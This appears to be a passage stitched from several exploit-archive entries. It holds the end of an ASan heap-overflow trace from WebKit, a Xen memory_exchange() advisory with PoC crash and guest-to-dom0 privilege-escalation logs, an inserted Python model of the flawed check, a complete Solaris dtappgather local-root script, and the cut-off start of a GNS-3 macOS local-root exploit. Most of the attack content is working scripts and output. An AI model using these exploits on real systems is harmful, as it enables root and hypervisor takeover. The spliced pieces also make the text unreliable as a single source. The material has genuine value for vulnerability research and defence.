#23 0x1143a3df1 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x697df1)
#24 0x1144d3118 in WebCore::DocumentWriter::end() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c7118)
#25 0x11449622f in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a22f)
#26 0x113f73b77 in WebCore::CachedResource::checkNotify() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x267b77)
#27 0x113f6d709 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x261709)
#28 0x11651ea04 in WebCore::SubresourceLoader::didFinishLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2812a04)
#29 0x1075ef6b5 in WebKit::WebResourceLoader::didFinishResourceLoad(double) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x9886b5)
#30 0x1075f2965 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x98b965)
#31 0x1075f1f8a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x98af8a)
#32 0x106f3c639 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x2d5639)
#33 0x106d17088 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb0088)
#34 0x106d206b4 in IPC::Connection::dispatchOneMessage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb96b4)
#35 0x10c514653 in WTF::RunLoop::performWork() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1880653)
#36 0x10c514ebe in WTF::RunLoop::performWork(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1880ebe)
#37 0x7fff9373e980 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa7980)
#38 0x7fff9371fa7c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88a7c)
#39 0x7fff9371ef75 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87f75)
#40 0x7fff9371e973 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87973)
#41 0x7fff92caaacb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30acb)
#42 0x7fff92caa900 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30900)
#43 0x7fff92caa735 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30735)
#44 0x7fff91250ae3 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x46ae3)
#45 0x7fff919cb21e in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x7c121e)
#46 0x7fff91245464 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3b464)
#47 0x7fff9120fd7f in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x5d7f)
#48 0x7fffa8edb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x108c6)
#49 0x7fffa8eda2e3 in xpc_main (/usr/lib/system/libxpc.dylib+0xf2e3)
#50 0x106c4bb73 in main (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#51 0x7fffa8c77254 in start (/usr/lib/system/libdyld.dylib+0x5254)
0x60c0000c8e88 is located 8 bytes to the right of 128-byte region [0x60c0000c8e00,0x60c0000c8e80)
allocated by thread T0 here:
#0 0x109508bf0 in wrap_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4abf0)
#1 0x10c55a01e in bmalloc::Allocator::allocateSlowCase(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c601e)
#2 0x10c4f5535 in bmalloc::Allocator::allocate(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1861535)
#3 0x10b257f38 in WTF::HashTable<WTF::RefPtr<WTF::UniquedStringImpl>, WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry> >, JSC::IdentifierRepHash, WTF::HashMap<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry, JSC::IdentifierRepHash, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> >, JSC::SymbolTableIndexHashTraits>::KeyValuePairTraits, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> > >::allocateTable(unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5c3f38)
#4 0x10b257df1 in WTF::HashTable<WTF::RefPtr<WTF::UniquedStringImpl>, WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry> >, JSC::IdentifierRepHash, WTF::HashMap<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry, JSC::IdentifierRepHash, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> >, JSC::SymbolTableIndexHashTraits>::KeyValuePairTraits, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> > >::rehash(unsigned int, WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry>*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5c3df1)
#5 0x10c30623a in WTF::HashTableAddResult<WTF::HashTableIterator<WTF::RefPtr<WTF::UniquedStringImpl>, WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry> >, JSC::IdentifierRepHash, WTF::HashMap<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry, JSC::IdentifierRepHash, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> >, JSC::SymbolTableIndexHashTraits>::KeyValuePairTraits, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> > > > WTF::HashMap<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry, JSC::IdentifierRepHash, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> >, JSC::SymbolTableIndexHashTraits>::add<JSC::SymbolTableEntry>(WTF::RefPtr<WTF::UniquedStringImpl> const&, JSC::SymbolTableEntry&&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x167223a)
#6 0x10c305cca in JSC::SymbolTable::cloneScopePart(JSC::VM&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1671cca)
#7 0x10b2c01e4 in JSC::CodeBlock::setConstantRegisters(WTF::Vector<JSC::WriteBarrier<JSC::Unknown>, 0ul, WTF::CrashOnOverflow, 16ul> const&, WTF::Vector<JSC::SourceCodeRepresentation, 0ul, WTF::CrashOnOverflow, 16ul> const&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x62c1e4)
#8 0x10b2bba44 in JSC::CodeBlock::finishCreation(JSC::VM&, JSC::ScriptExecutable*, JSC::UnlinkedCodeBlock*, JSC::JSScope*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x627a44)
#9 0x10c290c73 in JSC::FunctionCodeBlock::create(JSC::VM*, JSC::FunctionExecutable*, JSC::UnlinkedFunctionCodeBlock*, JSC::JSScope*, WTF::PassRefPtr<JSC::SourceProvider>, unsigned int, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fcc73)
#10 0x10c2901ea in JSC::ScriptExecutable::newCodeBlockFor(JSC::CodeSpecializationKind, JSC::JSFunction*, JSC::JSScope*, JSC::JSObject*&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fc1ea)
#11 0x10c29182a in JSC::ScriptExecutable::prepareForExecutionImpl(JSC::VM&, JSC::JSFunction*, JSC::JSScope*, JSC::CodeSpecializationKind, JSC::CodeBlock*&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fd82a)
#12 0x10bf2c921 in JSC::LLInt::setUpCall(JSC::ExecState*, JSC::Instruction*, JSC::CodeSpecializationKind, JSC::JSValue, JSC::LLIntCallLinkInfo*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1298921)
#13 0x10bf3b9ce in llint_entry (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a79ce)
#14 0x10bf34faa in vmEntryToJavaScript (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a0faa)
#15 0x10bbf7d1d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf63d1d)
#16 0x10bb80c6d in JSC::Interpreter::execute(JSC::ProgramExecutable*, JSC::ExecState*, JSC::JSObject*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xeecc6d)
#17 0x10b371316 in JSC::evaluate(JSC::ExecState*, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6dd316)
#18 0x10b37151e in JSC::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6dd51e)
#19 0x116201743 in WebCore::JSMainThreadExecState::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24f5743)
#20 0x1162012b4 in WebCore::ScriptController::evaluateInWorld(WebCore::ScriptSourceCode const&, WebCore::DOMWrapperWorld&, WebCore::ExceptionDetails*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24f52b4)
#21 0x116214881 in WebCore::ScriptElement::executeClassicScript(WebCore::ScriptSourceCode const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2508881)
#22 0x116211943 in WebCore::ScriptElement::prepareScript(WTF::TextPosition const&, WebCore::ScriptElement::LegacyTypeSupport) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2505943)
#23 0x114a13b5c in WebCore::HTMLScriptRunner::runScript(WebCore::Element*, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd07b5c)
#24 0x114a13895 in WebCore::HTMLScriptRunner::execute(WTF::PassRefPtr<WebCore::Element>, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd07895)
#25 0x11493fc35 in WebCore::HTMLDocumentParser::runScriptsForPausedTreeBuilder() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc33c35)
#26 0x114940372 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc34372)
#27 0x11493f544 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc33544)
#28 0x114940f9d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc34f9d)
#29 0x1143a3df1 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x697df1)
SUMMARY: AddressSanitizer: heap-buffer-overflow (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1671069) in JSC::SymbolTableEntry::isWatchable() const
Shadow bytes around the buggy address:
0x1c1800019180: 00 00 00 00 00 00 06 fa fa fa fa fa fa fa fa fa
0x1c1800019190: 00 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
0x1c18000191a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c18000191b0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c18000191c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1c18000191d0: fa[fa]fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c18000191e0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c18000191f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1800019200: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800019210: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c1800019220: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==55079==ABORTING
-->
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184
This bug report describes a vulnerability in memory_exchange() that
permits PV guest kernels to write to an arbitrary virtual address with
hypervisor privileges. The vulnerability was introduced through a
broken fix for CVE-2012-5513 / XSA-29.
The fix for CVE-2012-5513 / XSA-29 introduced the following check in
the memory_exchange() hypercall handler:
if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
!guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
{
rc = -EFAULT;
goto fail_early;
}
guest_handle_okay() calls array_access_ok(), which calls access_ok(),
which is implemented as follows:
/*
* Valid if in +ve half of 48-bit address space, or above
* Xen-reserved area.
* This is also valid for range checks (addr, addr+size). As long
* as the start address is outside the Xen-reserved area then we
* will access a non-canonical address (and thus fault) before
* ever reaching VIRT_START.
*/
#define __addr_ok(addr) \
(((unsigned long)(addr) < (1UL<<47)) || \
((unsigned long)(addr) >= HYPERVISOR_VIRT_END))
#define access_ok(addr, size) \
(__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))
As the comment states, access_ok() only checks the address, not the
size, if the address points to guest memory, based on the assumption
that any caller of access_ok() will access guest memory linearly,
starting at the supplied address. Callers that want to access a
subrange of the memory referenced by a guest handle are supposed to
use guest_handle_subrange_okay(), which takes an additional start
offset parameter, instead of guest_handle_okay().
memory_exchange() uses guest_handle_okay(), but only accesses the
guest memory arrays referenced by exch.in.extent_start and
exch.out.extent_start starting at exch.nr_exchanged, a 64-bit offset.
The intent behind exch.nr_exchanged is that guests always set it to 0
and nonzero values are only set when a hypercall has to be restarted
because of preemption, but this isn't enforced.
Therefore, by invoking this hypercall with crafted arguments, it is
possible to write to an arbitrary memory location that is encoded as
exch.out.extent_start + 8 * exch.nr_exchanged
where exch.out.extent_start points to guest memory and
exch.nr_exchanged is an attacker-chosen 64-bit value.
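The distinction the report draws between the start-address check and a subrange check, as an added Python model (not Xen's code): addr_ok mirrors the quoted __addr_ok macro, guest_handle_okay ignores the element count exactly as the text describes, and guest_handle_subrange_okay validates the address of the first element the caller will actually touch. HYPERVISOR_VIRT_END is set to an assumed x86_64 value only so the model is concrete, and the guest buffer address is constructed.

```python
MASK64 = (1 << 64) - 1
POSITIVE_HALF = 1 << 47                    # "+ve half of 48-bit address space" (quoted comment)
HYPERVISOR_VIRT_END = 0xFFFF880000000000   # assumed x86_64 value; only to make the model concrete
EXTENT_SIZE = 8                            # one 64-bit extent entry per array slot


def addr_ok(addr):
    """Model of __addr_ok(): only the single address is examined."""
    return addr < POSITIVE_HALF or addr >= HYPERVISOR_VIRT_END


def guest_handle_okay(start, nr_extents):
    """Model of guest_handle_okay(): once `start` is guest memory the count is not
    examined (nr_extents is intentionally unused), which is only safe when the
    caller accesses the array linearly from `start`."""
    return addr_ok(start)


def first_touched(start, nr_exchanged):
    """The address memory_exchange() writes first: start + 8 * nr_exchanged, with
    64-bit wrap-around because nr_exchanged is a 64-bit value."""
    return (start + EXTENT_SIZE * nr_exchanged) & MASK64


def guest_handle_subrange_okay(start, first, last):
    """Model of the subrange variant: validate the element actually accessed first."""
    return first <= last and addr_ok(first_touched(start, first))


def in_xen_reserved_area(addr):
    """True when an address lies outside guest space in this model."""
    return POSITIVE_HALF <= addr < HYPERVISOR_VIRT_END


def evaluate(start, nr_extents, nr_exchanged):
    """What each check says about one argument set, and where the first write lands."""
    return {
        "base_check_passes": guest_handle_okay(start, nr_extents),
        "subrange_check_passes": guest_handle_subrange_okay(start, nr_exchanged, nr_extents - 1),
        "first_write_in_xen": in_xen_reserved_area(first_touched(start, nr_exchanged)),
    }


GUEST_BUF = 0x7FFFF7A00000   # constructed guest user-space address

if __name__ == "__main__":
    # The intended use: nr_exchanged == 0, both checks agree.
    print(evaluate(GUEST_BUF, nr_extents=4, nr_exchanged=0))
    # A nr_exchanged that moves the first access above 2^47: the base check still
    # passes (it only looked at GUEST_BUF) while the subrange check rejects it.
    too_far = (POSITIVE_HALF - GUEST_BUF) // EXTENT_SIZE + 1
    print(evaluate(GUEST_BUF, nr_extents=too_far + 1, nr_exchanged=too_far))
```

The second evaluation is the whole bug in one line: the check that ran and the address that was used are about different bytes. The report's two suggested remedies map directly onto this model, either make access_ok validate the full range, or rename it so that callers cannot mistake a start-address check for a range check.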
I have attached a proof of concept. This PoC demonstrates the issue by
overwriting the first 8 bytes of the IDT entry for #PF, causing the
next pagefault to doublefault. To run the PoC, unpack it in a normal
64-bit PV domain and run the following commands in the domain as root:
root@pv-guest:~# cd crashpoc
root@pv-guest:~/crashpoc# make -C /lib/modules/$(uname -r)/build M=$(pwd)
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
LD /root/crashpoc/built-in.o
CC [M] /root/crashpoc/module.o
nasm -f elf64 -o /root/crashpoc/native.o /root/crashpoc/native.asm
LD [M] /root/crashpoc/test.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: could not find /root/crashpoc/.native.o.cmd for /root/crashpoc/native.o
CC /root/crashpoc/test.mod.o
LD [M] /root/crashpoc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/crashpoc# insmod test.ko
root@pv-guest:~/crashpoc# rmmod test
The machine on which I tested the PoC was running Xen 4.6.0-1ubuntu4
(from Ubuntu 16.04.2). Executing the PoC caused the following console
output:
(XEN) *** DOUBLE FAULT ***
(XEN) ----[ Xen-4.6.0 x86_64 debug=n Tainted: C ]----
(XEN) CPU: 0
(XEN) RIP: e033:[<0000557b46f56860>] 0000557b46f56860
(XEN) RFLAGS: 0000000000010202 CONTEXT: hypervisor
(XEN) rax: 00007fffe9cfafd0 rbx: 00007fffe9cfd160 rcx: 0000557b47ebd040
(XEN) rdx: 0000000000000001 rsi: 0000000000000004 rdi: 0000557b47ec52e0
(XEN) rbp: 00007fffe9cfd158 rsp: 00007fffe9cfaf30 r8: 0000557b46f7df00
(XEN) r9: 0000557b46f7dec0 r10: 0000557b46f7df00 r11: 0000557b47ec5878
(XEN) r12: 0000557b47ebd040 r13: 00007fffe9cfb0c0 r14: 0000557b47ec52e0
(XEN) r15: 0000557b47ed5e70 cr0: 0000000080050033 cr4: 00000000001506a0
(XEN) cr3: 0000000098e2e000 cr2: 00007fffe9cfaf93
(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: e02b cs: e033
(XEN)
(XEN) ****************************************
(XEN) Panic on CPU 0:
(XEN) DOUBLE FAULT -- system shutdown
(XEN) ****************************************
(XEN)
(XEN) Reboot in five seconds...
I strongly recommend changing the semantics of access_ok() so that it
guarantees that any access to an address inside the specified range is
valid. Alternatively, add some prefix, e.g. "UNSAFE_", to the names of
access_ok() and appropriate wrappers to prevent people from using
these functions improperly. Currently, in my opinion, the function
name access_ok() is misleading.
Proof of Concept: xen_memory_exchange_crashpoc.tar
################################################################################
I have written an exploit (attached).
Usage (in an unprivileged PV guest with kernel headers, gcc, make, nasm and hexdump):
root@pv-guest:~/privesc_poc# ./compile.sh
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
LD /root/privesc_poc/built-in.o
CC [M] /root/privesc_poc/module.o
nasm -f elf64 -o /root/privesc_poc/native.o /root/privesc_poc/native.asm
LD [M] /root/privesc_poc/test.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: could not find /root/privesc_poc/.native.o.cmd for /root/privesc_poc/native.o
CC /root/privesc_poc/test.mod.o
LD [M] /root/privesc_poc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/privesc_poc# ./attack 'id > /tmp/owned_by_the_guest'
press enter to continue
<press enter>
root@pv-guest:~/privesc_poc#
dmesg in the unprivileged PV guest:
[ 721.413415] call_int_85 at 0xffffffffc0075a90
[ 721.420167] backstop_85_handler at 0xffffffffc0075a93
[ 722.801566] PML4 at ffff880002fe3000
[ 722.808216] PML4 entry: 0x13bba4067
[ 722.816161] ### trying to write crafted PUD entry...
[ 722.824178] ### writing byte 0
[ 722.832193] write_byte_hyper(ffff88007a491008, 0x7)
[ 722.840254] write_byte_hyper successful
[ 722.848234] ### writing byte 1
[ 722.856170] write_byte_hyper(ffff88007a491009, 0x80)
[ 722.864219] write_byte_hyper successful
[ 722.872241] ### writing byte 2
[ 722.880215] write_byte_hyper(ffff88007a49100a, 0x35)
[ 722.889014] write_byte_hyper successful
[ 722.896232] ### writing byte 3
[ 722.904265] write_byte_hyper(ffff88007a49100b, 0x6)
[ 722.912599] write_byte_hyper successful
[ 722.920246] ### writing byte 4
[ 722.928270] write_byte_hyper(ffff88007a49100c, 0x0)
[ 722.938554] write_byte_hyper successful
[ 722.944231] ### writing byte 5
[ 722.952239] write_byte_hyper(ffff88007a49100d, 0x0)
[ 722.961769] write_byte_hyper successful
[ 722.968221] ### writing byte 6
[ 722.976219] write_byte_hyper(ffff88007a49100e, 0x0)
[ 722.984319] write_byte_hyper successful
[ 722.992233] ### writing byte 7
[ 723.000234] write_byte_hyper(ffff88007a49100f, 0x0)
[ 723.008341] write_byte_hyper successful
[ 723.016254] ### writing byte 8
[ 723.024357] write_byte_hyper(ffff88007a491010, 0x0)
[ 723.032254] write_byte_hyper successful
[ 723.040236] ### crafted PUD entry written
[ 723.048199] dummy
[ 723.056199] going to link PMD into target PUD
[ 723.064238] linked PMD into target PUD
[ 723.072206] going to unlink mapping via userspace PUD
[ 723.080230] mapping unlink done
[ 723.088251] copying HV and user shellcode...
[ 723.096283] copied HV and user shellcode
[ 723.104270] int 0x85 returned 0x7331
[ 723.112237] remapping paddr 0x13bb86000 to vaddr 0xffff88000355a800
[ 723.120192] IDT entry for 0x80 should be at 0xffff83013bb86800
[ 723.128226] remapped IDT entry for 0x80 to 0xffff804000100800
[ 723.136260] IDT entry for 0x80: addr=0xffff82d08022a3d0, selector=0xe008, ist=0x0, p=1, dpl=3, s=0, type=15
[ 723.144291] int 0x85 returned 0x1337
[ 723.152235] === END ===
The supplied shell command executes in dom0 (and all other 64bit PV domains):
root@ubuntu:~# cat /tmp/owned_by_the_guest
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
Note that the exploit doesn't clean up after itself - shutting down the attacking domain will panic the hypervisor.
I have tested the exploit in the following configurations:
configuration 1:
running inside VMware Workstation
Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)"
dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu
unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu
configuration 2:
running on a physical machine with Qubes OS 3.1 installed
Xen version 4.6.3
Proof of Concept: privesc_poc.tar.gz
################################################################################
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41870.zip
#!/bin/ksh
#Exploit PoC reverse engineered from EXTREMEPARR which provides
#local root on Solaris 7 - 11 (x86 & SPARC). Uses a environment
#variable of setuid binary dtappgather to manipulate file
#permissions and create a user owned directory anywhere on the
#system (as root). Can then add a shared object to locale folder
#and run setuid binaries with an untrusted library file.
#
# e.g.
# $ id;uname -a; ./dtappgather-poc.sh
# uid=60001(nobody) gid=60001(nobody)
# SunOS sparc 5.8 Generic_117350-39 sun4m sparc SUNW,SPARCstation-20
# [+] '/usr/dt/bin/dtappgather' directory traversal exploit
# [-] get rid of any of our desktop files
# [-] exploiting the traversal bug...
# changePermissions: /var/dt/appconfig/appmanager/..| : No such file or directory
# MakeDirectory: /var/dt/appconfig/appmanager/..: File exists
# changePermissions: /var/dt/appconfig/appmanager/..| : No such file or directory
# [-] symlink attack create our directory
# dr-xr-xr-x 2 nobody nobody 512 Apr 11 14:40 pdkhax
# [-] Done. "/usr/lib/locale/pdkhax" is writeable
# $
#
# To get root privileges simply exploit "at" by adding a .so.2
# file in the new locale directory and calling "at".
#
# $ at -f /etc/passwd 11:11
# job 1491991860.a at Ons Apr 12 11:11:00 2017
# $ LC_TIME=pdkhax at -l
# # id
# uid=0(root) gid=60001(nobody)
#
# -- Hacker Fantastic (www.myhackerhouse.com)
echo "[+] '/usr/dt/bin/dtappgather' directory traversal exploit"
echo "[-] get rid of any of our desktop files"
chmod -R 777 /var/dt/appconfig/appmanager/*
rm -rf /var/dt/appconfig/appmanager/*
echo "[-] exploiting the traversal bug..."
DTUSERSESSION=. /usr/dt/bin/dtappgather
DTUSERSESSION=. /usr/dt/bin/dtappgather
DTUSERSESSION=.. /usr/dt/bin/dtappgather
DTUSERSESSION=.. /usr/dt/bin/dtappgather
DTUSERSESSION=.. /usr/dt/bin/dtappgather
echo "[-] symlink attack create our directory"
ln -sf /usr/lib/locale /var/dt/appconfig/appmanager
DTUSERSESSION=pdkhax /usr/dt/bin/dtappgather
ls -al /usr/lib/locale | grep pdkhax
rm -rf /var/dt/appconfig/appmanager
chmod 755 /usr/lib/locale/pdkhax
echo '[-] Done. "/usr/lib/locale/pdkhax" is writeable'
#!/bin/sh
# GNS-3 Mac OS-X LPE local root exploit
# =====================================
# GNS-3 on OS-X bundles the "ubridge" binary as a setuid
# root file. This file can be used to read arbitrary files
# using the "-f" argument, but as it runs as root it can also
# write arbitrary files via the "pcap_file" setting in its
# configuration ini file. It is possible to abuse this utility
# to also write arbitrary contents by bridging a UDP tunnel
# and writing to disk. We can exploit these mishaps to gain
# root privileges on a host that has GNS-3 installed by
# writing a malicious crontab entry and escalating privileges.
# This exploit takes advantage of this flaw to overwrite
# root crontab with our own entry and to spawn a root shell.
# Don't forget to clean up in /usr/lib/spool/tabs and /tmp
# after running. Tested on GNS-3 version 1.5.2. The root user
# must have a crontab installed (even an empty one set with
# crontab -e) or the box rebooted after first attempt to get
# commands to execute with this cron method.
#
# $ ./gns3super-osx.sh
# [+] GNS-3 Mac OS-X local root LPE exploit 0day
# [-] creating ubridge.ini file...
# [-] Launching ubridge..
# [-] Preparing cron script...
# Parsing prdelka
# Creating UDP tunnel 40000:127.0.0.1:40001
# Creating UDP tunnel 50000:127.0.0.1:50001
# Starting packet capture to /usr/lib/cron/tabs/root with protocol (null)
# unknown link type (null), assuming Ethernet.
# Capturing to file '/usr/lib/cron/tabs/root'
# Source NIO listener thread for prdelka has started
